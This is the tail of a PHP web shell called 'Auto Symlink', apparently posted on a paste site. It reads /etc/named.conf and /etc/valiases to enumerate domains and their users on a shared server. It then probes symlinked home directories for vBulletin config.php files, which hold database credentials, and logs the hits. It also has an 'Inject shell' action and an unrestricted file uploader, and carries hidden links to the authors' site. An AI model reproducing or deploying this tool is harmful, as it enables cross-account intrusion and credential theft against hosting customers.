  1178. $r = '<b style="color:red">failed</b>';
  1179.  
  1180. }
  1181.  
  1182. $domins = trim($domin).'';
  1183.  
  1184. echo "<tr>
  1185. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1186. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  1187.  
  1188.  
  1189.  
  1190.  
  1191.  
  1192.  
  1193.  
  1194. }else{
  1195.  
  1196. echo "<tr>
  1197. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1198. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  1199. }
  1200.  
  1201. }
  1202.  
  1203.  
  1204.  
  1205.  
  1206.  
  1207.  
  1208.  
  1209.  
  1210.  
  1211.  
  1212. die();
  1213.  
  1214. }
  1215.  
  1216. if(!is_file('named.txt')){
  1217.  
  1218. $d00m = file("/etc/named.conf");
  1219.  
  1220. }else{
  1221.  
  1222. $d00m = file("named.txt");
  1223.  
  1224.  
  1225. }
  1226. if(!$d00m)
  1227. {
  1228.  
  1229.                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1230. }
  1231. else
  1232.  
  1233. {
  1234. echo "<div class='tmp'>
  1235. <form method='POST' action='$pg?sws=vb'>
  1236. <input type='submit' value='Inject shell' />
  1237. <input type='hidden' value='1' name='s' />
  1238. </form>
  1239. <br /><br />
  1240. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1241.  
  1242. $f = fopen('vb.txt','w');
  1243.  
  1244. foreach($d00m as $dom){
  1245.  
  1246. if(eregi("zone",$dom)){
  1247.  
  1248. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1249.  
  1250. if(strlen(trim($domsws[1][0])) > 2){
  1251.  
  1252. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1253.  
  1254. ///////////////////////////////////////////////////////////////////////////////////
  1255.  
  1256. $wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
  1257. $wpp=get_headers($wpl);
  1258. $wp=$wpp[0];
  1259.  
  1260. $wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
  1261. $wpp2=get_headers($wp2);
  1262. $wp12=$wpp2[0];
  1263.  
  1264. $wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
  1265. $wpp3=get_headers($wp3);
  1266. $wp13=$wpp3[0];
  1267.  
  1268.  
  1269. ////////// vb ////////////
  1270.  
  1271. $pos = strpos($wp, "200");
  1272. $config="&nbsp;";
  1273.  
  1274. if (strpos($wp, "200") == true )
  1275. {
  1276. $config= $wpl;
  1277. }
  1278. elseif (strpos($wp12, "200") == true)
  1279. {
  1280.  $config= $wp2;
  1281. }
  1282. elseif (strpos($wp13, "200") == true)
  1283. {
  1284.  $config= $wp3;
  1285. }
  1286. else
  1287. {
  1288. continue;
  1289.  
  1290. }
  1291. flush();
  1292.  
  1293. /////////////////////////////////////////////////////////////////////////////////////
  1294.  
  1295. $dom = $domsws[1][0];
  1296.  
  1297. $w = fwrite($f,"$config||$dom \n");
  1298. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1299.  
  1300.  
  1301. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1302. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1303.  
  1304.  
  1305.  
  1306.  
  1307.  
  1308. flush();
  1309.  
  1310.  
  1311. }
  1312. }
  1313. }
  1314. }
  1315.  
  1316.  
  1317.  
  1318.  
  1319.  
  1320.  
  1321.  
  1322.  
  1323. break;
  1324.  
  1325. case 'help':
  1326.  
  1327. echo "<div class='tmp'>
  1328. <table align='center' width='40%'><td>function</td><td>Case</td>";
  1329.  
  1330.  
  1331. $safe_mode = ini_get('safe_mode');
  1332.     if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1333.  
  1334. echo "<tr><td>Safe Mode</td><td>$r</td>";
  1335.  
  1336. $fun = function_exists('symlink');
  1337.     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1338.  
  1339. echo "<tr><td>function symlink</td><td>$r</td>";
  1340.  
  1341.  
  1342. $fun = function_exists('file');
  1343.     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1344.  
  1345. echo "<tr><td>function file</td><td>$r</td>";
  1346.  
  1347. $fun = function_exists('file_get_contents');
  1348.     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1349.  
  1350. echo "<tr><td>function file_get_contents</td><td>$r</td>";
  1351.  
  1352. $fun = function_exists('mkdir');
  1353.     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1354.  
  1355. echo "<tr><td>function mkdir</td><td>$r</td>";
  1356.  
  1357.  
  1358. $fun = is_dir('sym/root');
  1359.     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1360.  
  1361. echo "<tr><td>Permission denied</td><td>$r</td>";
  1362.  
  1363.  
  1364. $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
  1365.     if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
  1366.  
  1367. echo "<tr><td>Forbidden</td><td>$r</td>";
  1368.  
  1369.  
  1370.  
  1371.  
  1372. echo "</table></div>";
  1373.  
  1374.  
  1375.  
  1376. break;
  1377. default:
  1378. header("Location: $pg");
  1379.  
  1380.  
  1381.  
  1382.  
  1383. }
  1384.  
  1385.  
  1386. /// home ///
  1387. }else
  1388. {
  1389.  
  1390.  
  1391. echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1392. echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1393. if( $_POST['_upl'] == "Upload" ) {
  1394.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
  1395.     else { echo '<br /><br />Not uploaded !!<br><br>'; }
  1396.  
  1397.  
  1398. }
  1399.  
  1400.    echo '
  1401. <br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
  1402. <br /><br />
  1403. <b style="color: red";>   Sec-w.Com  </b>
  1404. <br /><br />
  1405. Muslims Hackers</div> ';
  1406.  
  1407. }
  1408.  
  1409.  
  1410. function ex($text,$a,$b){
  1411. $explode = explode($a,$text);
  1412. $explode = explode($b,$explode[1]);
  1413. return $explode[0];
  1414. }
  1415.  
  1416.  
  1417.  
  1418. echo '</div>
  1419.  
  1420. <a style="text-decoration: none; color: #F4F4F4;" title="?§?„?­?…?§???‡"/href="http://sec-w.com/cc">?§?„?­?…?§???‡</a>
  1421.  
  1422. <a style="text-decoration: none; color: #F4F4F4;" title="???§?„?… ?§?„?­?…?§???‡"/href="http://sec-w.com/cc">???§?„?… ?§?„?­?…?§???‡</a>
  1423.  
  1424.  
  1425.  
  1426. </body>
  1427.  
  1428. </html>
  1429. ';
  1430.  
  1431. ?>

Reply to "Auto Symlink"

Here you can reply to the paste above